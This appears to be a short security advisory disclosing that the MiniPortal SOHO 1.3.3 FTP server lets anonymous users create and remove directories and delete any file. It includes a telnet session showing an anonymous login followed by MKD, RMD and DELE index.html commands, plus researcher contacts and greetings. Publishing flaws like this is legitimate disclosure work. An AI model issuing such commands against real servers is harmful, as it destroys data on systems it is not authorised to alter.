Product : MiniPortal SOHO

Version : 1.3.3

OSystem : Windows

Authors : Instant Servers Inc

WebSite : http://www.instantservers.com

Problem : Create and Remove directories with anonymous access

Description:

------------

eng:

====

MiniPortal includes the following components:

WEB Server [Apache 1.3.27]

FTP Server

DNS Server

During research of components of the server, the following was revealed:

The anonymous user can create and delete directories on the server,

And also can delete any files on it.

Exploits:

---------

>>Telnet 127.0.0.1 21

220 FTP Server, ready

>> USER anonymous

331 Password required

>> PASS anonymous@localhost

230 User logged in

>>MKD test

257 "test" created

>>RMD test

200 Okay

>>DELE index.html

200 Okay

Contacts:

---------

r2subj3ct (at) dwclan (dot) org [email concealed]

subj.24h.to (www.dwcgr0up.com/subj/)

www.dwcgr0up.com

irc.dwcgr0up.biz #dwc

Thanks:

-------

DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies

DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.

[ reply ]